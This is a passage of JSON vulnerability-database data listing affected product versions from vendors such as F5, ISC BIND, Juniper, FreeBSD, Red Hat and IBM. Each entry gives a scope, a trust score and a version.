"model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "big-ip edge gateway 11.0.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "junos 15.1x49-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "9.3-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "i v4r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.3" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.2" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "i v4r2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "junos 14.1x53-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind -p2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.2" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "junos 12.1x46-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.2" }, { "model": "big-ip psm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "bind rc2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.3" }, { "model": "big-ip gtm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "mac os server", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x4.1.5" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.1.2" }, { "model": "junos 12.3x50-d50", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind 9.5.0a3", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "junos 14.1r6", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "9.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-iq cloud hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.4" }, { "model": "big-ip link controller hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos 12.1x47-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip edge gateway hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "8.4-release-p23", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1.0" }, { "model": "8.4-release-p24", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.1.1" }, { "model": "bind 9.5.0b2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "netezza host management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.8.0" }, { "model": "junos 12.1x46-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.1" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.2" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip link controller hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "big-ip edge gateway hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "bind a2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "junos 15.1r3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.1" }, { "model": "junos 13.2r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "bind 9.6.1-p2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "bind p2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.7.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "8.4-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "big-ip wom hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "junos 14.1x53-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip analytics 11.0.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip afm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "bind a3", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "bind 9.5.1b1", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "hp-ux b.11.31.08", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.7.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "junos 13.2x51-d26", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip analytics hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "bind rc2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "junos 14.2r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "junos 12.1x44-d45", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.1" }, { "model": "junos d10", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "junos 12.1x46-d35", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip link controller hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "bind p1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.7.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "bind -p1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.2" }, { "model": "junos 12.1x44-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind 9.5.0-p2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "i v4r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "junos 12.1x46-d45", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip link controller hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "junos 12.1x47-d11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "junos 13.3r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "junos 12.3r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "9.3-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "junos 14.1x53-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1.0" }, { "model": "junos 13.2r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.8" }, { "model": "big-ip edge gateway 11.1.0-hf3", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "junos 13.2x51-d40", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "junos 13.2x51-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "netezza host management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.7.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "i v5r1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "bind 9.5.0b1", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.1" }, { "model": "junos d25", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "junos 12.1x47-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 14.1r7", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.3r3.4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind b1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.3" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip link controller hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "junos 12.1x44-d20.3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind 9.5.0a5", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "i v5r2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.5" }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "junos d35", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "i v4r1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "8.4-release-p20", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "junos os 12.3x50-d42", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "bind 9.7.1-p2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "hp-ux b.11.31.09", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "junos 12.1x44-d40", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x44-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind rc3", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.7" }, { "model": "big-ip link controller hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "bind p1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.5.1" }, { "model": "big-ip analytics hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.1" }, { "model": "junos 12.1x46-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 13.2r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-iq adc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.5" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "8.4-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip gtm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.80" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip gtm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.6" }, { "model": "big-ip link controller 11.1.0-hf3", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "linux enterprise server sp4 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "bind 9.4.3b2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "junos 15.1f3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip link controller hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "bind rc1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.3" }, { "model": "bind b", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.3.3" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "bind -p1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.1.0" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "8.4-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.7.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1.0" }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.4" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "i v5r1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "junos 13.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x46-d20.5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind b1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "junos 12.3x48-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "8.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "i v3r7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.5" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "big-ip apm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip analytics hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "junos 12.1x46-d40", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "junos 12.3r11", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip psm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "bind 9.4.3-p1", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "junos 13.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.2.3" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.4" }, { "model": "bind b2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "bind 9.3.5-p2", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "i v3r7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "bind 9.4.3-p4", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip link controller 11.1.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "i v4r2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "bind p3", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4.3" }, { "model": "junos 13.2x51-d36", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.2" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "8.4-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "junos 15.1x49-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "junos 12.1x44-d24", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "northstar controller application service pack", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "2.1.01" }, { "model": "i v4r2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "junos 15.1f2-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tcp/ip services for openvms bind eco5", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.7" }, { "model": "junos 14.1r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 14.1x53-d18", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "9.3-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "bind rc1", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1.0" }, { "model": "i v4r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "junos 12.3r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "junos 12.3r9", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bind 9.6.1-p3", "scope": null, "trust": 0.3, "vendor": "isc", "version": null }, { "model": "bind a2", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.5" }, { "model": "bind a6", "scope": "eq", "trust": 0.3, "vendor": "isc", "version": "9.4" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "bind 9.5.0a4", "scope": 